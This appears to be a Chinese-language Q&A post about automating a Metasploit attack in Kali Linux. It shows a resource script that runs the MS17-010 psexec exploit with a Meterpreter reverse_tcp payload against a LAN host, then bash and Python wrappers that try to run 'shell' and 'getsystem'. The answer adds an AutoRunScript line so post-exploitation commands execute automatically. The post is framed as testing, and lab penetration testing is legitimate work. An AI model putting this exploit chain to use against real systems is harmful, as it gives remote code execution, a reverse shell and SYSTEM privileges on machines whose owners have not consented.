0

我想在kali linux中使用metasploit自动化攻击(出于某些测试目的)。Metasploit 命令保存在 ms17-010.rc 文件中,并在脚本中调用该文件,然后是meterpreter 命令。我已经尝试过 bash 脚本(Attack_script.sh)和 python 脚本(test.py)。问题是:

执行第一个命令“msfconsole -r /root/ms17-010.rc”后,打开第一个metasploit控制台并执行保存在“ms17-010.rc”文件中的命令。然后在同一个终端上获得一个meterpreter控制台,但它不执行剩余的命令,我想在Meterpreter上运行。当我退出meterpreter和msfconsole时,命令在终端上执行。

问题在于 bash 和 python 脚本。希望我清楚。请帮帮我。

## Msf RC 脚本:ms17-010.rc ###### 


use exploit/windows/smb/ms17_010_psexec 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.10.16
set LPORT 4444
set RHOST 192.168.10.17
exploit
## Bash 脚本: Attack_script.sh ###### 
#!/bin/bash
msfconsole -r /root/ms17-010.rc
shell
getsystem
## python 脚本:test.py ###### 
from os import *

system ( 'msfconsole -r /root/ms17-010.rc' )
system("shell")
system("getsystem")
4

1 回答 1

0

在那个 ms17-010.rc 中再添加一行 'set AutoRunScript multi_console_command -r Meterpreter.rb' 这样它将在meterpreter shell中执行存储在meterpreter.rb中的命令。您需要使用要执行和完成的命令创建一个 .rb 脚本

于 2020-10-30T19:06:32.157 回答